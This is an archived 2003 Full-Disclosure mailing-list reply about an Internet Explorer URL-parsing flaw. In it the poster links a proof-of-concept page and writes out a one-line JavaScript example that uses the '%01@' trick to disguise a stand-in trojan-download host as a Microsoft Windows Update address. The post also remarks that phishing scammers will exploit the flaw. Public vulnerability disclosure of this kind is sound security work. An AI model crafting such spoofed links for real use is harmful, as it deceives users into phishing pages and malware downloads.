[Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: S G Masood <sgmasood@yahoo.com>
Date: Tue Dec 09 2003 - 12:22:59 CST
Date: Tue Dec 09 2003 - 12:22:59 CST
LOL. This is so simple and dangerous, it almost made
me laugh and cry at the same time. Most of you will
realise why...;D
The Paypal, AOL, Visa, Mastercard, et al email
scammers will have a harvest of gold this month with
lots of zombies falling for this simple technique.
># POC ##########
>http://www.zapthedingbat.com/security/ex01/vun1.htm
Dont be surprised if your latest download from
http://www.microsoft.com turns out to be a trojan!
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com);
-- S.G.Masood Hyderabad, India PS: One more thing - no scripting required to exploit this. __________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.htmlReceived on Tue Dec 09 12:44:41 2003
This archive was generated by hypermail 2.1.8 : Tue Dec 09 2003 - 13:01:01 CST
Custom Search
